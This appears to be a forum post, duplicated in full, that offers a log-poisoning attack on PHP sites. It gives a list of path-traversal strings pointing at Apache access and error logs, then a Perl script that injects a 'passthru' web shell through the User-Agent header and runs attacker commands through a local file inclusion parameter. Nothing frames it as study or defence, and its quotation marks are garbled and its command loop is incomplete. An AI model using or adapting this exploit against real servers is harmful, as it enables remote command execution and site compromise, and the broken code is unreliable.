[align=LEFT]
[php]
./apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Code
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site=â€www.vulnerablesite.comâ€;
$path=â€/â€;
$code=â€<? Passthru(\$_GET[cmd]) ?>â€;
$log = “../../../../../../../etc/httpd/logs/error_logâ€;
print “Trying to inject the codeâ€;
$socket = IO::Socket::INET->new(Proto=>â€tcpâ€, PeerAddr=>â€$siteâ€, PeerPort=>â€80â€) or die
“\nConnection Failed.\n\nâ€;
print $socket “GET “.$path.$code.†HTTP/1.1\r\nâ€;
print $socket “User-Agent: “.$code.â€\r\nâ€;
print $socket “Host: “.$site.â€\r\nâ€;
print $socket “Connection: close\r\n\r\nâ€;
close($socket);
print “\nCode $code successfully injected in $log \nâ€;
print “\nType command to run or exit to end: “;
$cmd = <STDIN>;
while($cmd !~ “exitâ€) {
$socket = IO::Socket::INET->new(Proto=>â€tcpâ€, PeerAddr=>â€$siteâ€, PeerPort=>â€80â€) or die
“\nConnection Failed.\n\nâ€;
print $socket “GET “.$path.â€index.php?filename=â€.$log.â€&cmd=$ cmd HTTP/1.1\r\nâ€;
print $socket “Host: “.$site.â€\r\nâ€;
print $socket “Accept: */*\r\nâ€;
print $socket “Connection: close\r\n\nâ€;
while ($show = <$socket>)
{
print $show;
}
print “Type command to run or exit to end: “;
[/php][/align]
[php]
./apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Code
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site=â€www.vulnerablesite.comâ€;
$path=â€/â€;
$code=â€<? Passthru(\$_GET[cmd]) ?>â€;
$log = “../../../../../../../etc/httpd/logs/error_logâ€;
print “Trying to inject the codeâ€;
$socket = IO::Socket::INET->new(Proto=>â€tcpâ€, PeerAddr=>â€$siteâ€, PeerPort=>â€80â€) or die
“\nConnection Failed.\n\nâ€;
print $socket “GET “.$path.$code.†HTTP/1.1\r\nâ€;
print $socket “User-Agent: “.$code.â€\r\nâ€;
print $socket “Host: “.$site.â€\r\nâ€;
print $socket “Connection: close\r\n\r\nâ€;
close($socket);
print “\nCode $code successfully injected in $log \nâ€;
print “\nType command to run or exit to end: “;
$cmd = <STDIN>;
while($cmd !~ “exitâ€) {
$socket = IO::Socket::INET->new(Proto=>â€tcpâ€, PeerAddr=>â€$siteâ€, PeerPort=>â€80â€) or die
“\nConnection Failed.\n\nâ€;
print $socket “GET “.$path.â€index.php?filename=â€.$log.â€&cmd=$ cmd HTTP/1.1\r\nâ€;
print $socket “Host: “.$site.â€\r\nâ€;
print $socket “Accept: */*\r\nâ€;
print $socket “Connection: close\r\n\nâ€;
while ($show = <$socket>)
{
print $show;
}
print “Type command to run or exit to end: “;
[/php][/align]
نظر